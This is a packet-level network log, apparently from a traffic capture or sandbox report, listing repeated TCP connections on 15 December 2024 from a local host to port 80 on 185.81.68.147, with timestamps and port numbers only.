                                                                                                                                                                                                                      Dec 15, 2024 09:16:02.918925047 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:02.920453072 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:03.025146961 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:03.040211916 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:03.145199060 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:03.146194935 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:03.146258116 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:03.265904903 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:03.266019106 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:03.385813951 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:04.761301994 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:04.761347055 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:04.761595011 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:04.779287100 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:04.890537024 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:04.899394989 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:05.011039019 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:05.011243105 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:05.011244059 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:05.131294966 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:05.131362915 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:05.251215935 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.633924961 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.634046078 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.634120941 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.635732889 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.744441986 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.755543947 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.864398003 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.864640951 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.864800930 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.984565973 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:06.984734058 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:07.104692936 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.299624920 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.299724102 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.299808979 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.312900066 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.420732021 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.432598114 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.540595055 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.540680885 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.540802956 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.660546064 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.660609961 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:08.780468941 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.148746014 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.148782969 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.148940086 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.150764942 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.259654999 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.270509005 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.379621029 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.379790068 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.379833937 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.499670982 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.499738932 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:10.619532108 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:11.977449894 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:11.977538109 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:11.977596998 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:11.978912115 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:12.087424040 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:12.098732948 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:12.207345963 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:12.209029913 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:12.209316015 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:12.329263926 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:12.329387903 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:12.449451923 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:13.907170057 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:13.907340050 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:13.907519102 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:13.908567905 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:14.009546041 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:14.028403997 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:14.129477024 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:14.129614115 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:14.131262064 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:14.250979900 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:14.251113892 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:14.371073008 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.585200071 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.585253954 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.585463047 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.587157011 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.697510004 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.708245039 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.817257881 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.817348957 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.817451954 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.937211990 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:15.937410116 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:16.057277918 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.414372921 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.414547920 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.414614916 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.416063070 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.525271893 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.535665989 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.644974947 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.645136118 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.666030884 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.785743952 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.785824060 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:17.905546904 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.113224983 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.113389969 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.113567114 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.114694118 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.228287935 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.234335899 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.348309040 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.348437071 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.348532915 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.468271017 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.468347073 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:19.588223934 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:20.974447966 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:20.974513054 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:20.974678993 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:21.004415989 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:21.121417046 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:21.124412060 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:21.241353035 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:21.241525888 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:21.241589069 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:21.361583948 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:21.361685038 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:21.481609106 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:22.847784042 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:22.847863913 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:22.848001957 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:22.849426985 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:22.962821960 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:22.969120026 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:23.082654953 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:23.083045959 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:23.083045959 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:23.202780962 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:23.206089020 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:23.326035976 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.526674986 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.526860952 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.526951075 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.528644085 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.634587049 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.648718119 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.754470110 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.754614115 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.754704952 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.874409914 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.874495029 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:24.994339943 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.420753956 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.421016932 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.421138048 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.422357082 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.524971962 CET4973580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.541975975 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.644840002 CET8049735185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.644977093 CET4973580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.645086050 CET4973580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.765043020 CET8049735185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.765218973 CET4973580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:26.884991884 CET8049735185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.088109016 CET8049735185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.088282108 CET8049735185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.088344097 CET4973580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.089729071 CET4973580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.197215080 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.214637041 CET8049735185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.317786932 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.318084002 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.318084002 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.438021898 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.438239098 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:28.558033943 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:29.931962967 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:29.932050943 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:29.932111025 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:29.933729887 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:30.040884018 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:30.053323984 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:30.160736084 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:30.160936117 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:30.180257082 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:30.299994946 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:30.300081968 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:30.420027971 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:31.775763988 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:31.776053905 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:31.776156902 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:31.778688908 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:31.884624004 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:31.898391962 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:32.004519939 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:32.004666090 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:32.004715919 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:32.124624968 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:32.124694109 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:32.244465113 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.467807055 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.467943907 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.468131065 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.482794046 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.588320971 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.603745937 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.710938931 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.711956024 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.729636908 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.849417925 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.850929022 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:33.970799923 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.305931091 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.306180954 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.306370974 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.307653904 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.415925026 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.427462101 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.535911083 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.536912918 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.536997080 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.656739950 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.656914949 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:35.776649952 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.023227930 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.023247957 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.023339033 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.052324057 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.165993929 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.171978951 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.285928965 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.286859035 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.318870068 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.438641071 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.438743114 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:37.558557987 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:38.728254080 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:38.728334904 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:38.729446888 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:38.729475021 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:38.837589979 CET4974980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:38.849216938 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:38.957353115 CET8049749185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:38.958930969 CET4974980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:38.959027052 CET4974980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:39.079812050 CET8049749185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:39.082844973 CET4974980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:39.203282118 CET8049749185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.407073975 CET8049749185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.407182932 CET8049749185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.407383919 CET4974980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.412250996 CET4974980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.525149107 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.533493996 CET8049749185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.644958019 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.645961046 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.646014929 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.766696930 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.766767979 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:40.886951923 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.078356028 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.078468084 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.078557014 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.080081940 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.181677103 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.199767113 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.301527023 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.302886963 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.302988052 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.422682047 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.422765017 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:16:42.542511940 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:44.022567034 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:44.022650957 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:16:44.022744894 CET4975680192.168.2.8185.81.68.147
